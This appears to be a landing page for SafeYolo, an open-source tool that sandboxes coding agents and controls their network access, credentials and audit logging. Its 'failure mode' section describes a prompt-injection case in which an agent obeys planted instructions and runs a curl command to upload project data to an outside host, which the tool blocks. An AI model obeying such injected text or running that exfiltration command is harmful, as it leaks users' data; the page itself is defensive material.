SafeYolo
Let coding agents work. Control where they can reach.
SafeYolo runs Claude Code, OpenAI Codex and other coding agents in isolated Linux sandboxes with controlled network and service access.Give agents guest-local root to install tools, run browsers, start services and debug code - without giving them unrestricted access to your host or the Internet.
Pre-v1 · Open source · macOS Apple Silicon + LinuxBuilt by Threatspotting
THE PROBLEM
Agents need freedom to work. That shouldn't mean unlimited authority.Coding agents install packages, launch browsers, run development servers, call APIs and increasingly work unattended for long periods.Approve every operation and you lose the autonomy.
Give the agent your machine and unrestricted network access and every mistake, injected instruction or runaway loop gets the same authority you do.The useful boundary is different:
Root inside the agent's sandbox, not on your host
Explicit external destinations and service capabilities
Service credentials kept outside the agent where possible
Limits on runaway network activity
A record of what the agent attempted and why it was allowed or blocked
SafeYolo separates local freedom from external authority.
WHAT SAFEYOLO DOES
Isolated workspace
Each agent gets its own Linux sandbox and persistent home:
hardware-backed microVMs on Apple Silicon macOS, rootless gVisor on Linux.Controlled network access
The sandbox has no external network interface.
Traffic leaves through SafeYolo, with per-agent policy for
destinations, approvals, rate budgets and service capabilities.Protected service credentials
The service gateway can keep credentials on the trusted host
and inject them only into authorised requests.
Credential guards restrict where detected secrets may be sent.Visible work
Inspect HTTP(S) traffic and open sandboxed browser
or desktop previews while the agent works.Limits and evidence
Rate budgets, circuit breakers and loop detection
constrain runaway activity.
Structured audit records preserve requests,
decisions and block reasons.
HOW IT FITS
YOUR TRUSTED HOST
Policy · approvals · credential vault
SafeYolo enforcement
│
controls │ boundary
│
AGENT SANDBOX — UNTRUSTED
Claude Code / Codex / tools
Guest-local root
Your selected workspace
No direct external network
│
▼
EXTERNAL SERVICES
Only through SafeYolo policy
On macOS: hardware-backed Linux microVMs.
On Linux: rootless gVisor.
A REAL FAILURE MODE
An agent encounters instructions in an issue,
dependency or web page telling it to send
project data to an external service.It complies.
agent$ curl https://unknown.example/upload ...HTTP 428 — access not authorised
Destination is outside this agent's policy.
The agent cannot route around SafeYolo,
its sandbox has no direct external network interface.If the request uses a service configured through SafeYolo's gateway,
the real service credential can remain on the host and is injected
only after the request is authorised.The attempt - including the policy decision and reason -
is recorded for the operator.
INSTALL
SafeYolo is currently pre-v1 and installed from source.macOS requires Apple Silicon, Command Line Tools, Lima and tmux. Linux supports x86_64 and arm64 and uses gVisor for sandboxing.
git clone https://github.com/craigbalding/safeyolo.git
cd safeyolo
./install.sh
safeyolo bootstrapOn macOS:
make -C vm installThen
safeyolo agent add work ~/code --host-script @claude
safeyolo agent run work
WHO IT’S FOR
Developers who want Claude Code, Codex or similar agents to work autonomously without giving them unrestricted host and network access
Teams running persistent or multiple coding agents that need per-agent boundaries, visibility and audit evidence
Security engineers using agents for browsers, APIs, testing and other workflows where external access needs to be controlled
Organisations experimenting with agent autonomy but unwilling to make “let it work” synonymous with “trust it with everything”

HELP / COMMERCIAL
SafeYolo is MIT-licensed open-source software.Threatspotting can help organisations use autonomous coding agents safely in real environments, including:
Agent sandbox and trust-boundary design
SafeYolo deployment and policy design
Service capability and credential architecture
Adversarial testing of agent containment and controls
Independent assurance and security review
Practical agent-security training for engineering and security teams
I've worked both sides of this problem: building security controls in regulated environments and breaking systems to test whether those controls really work.Email: [email protected]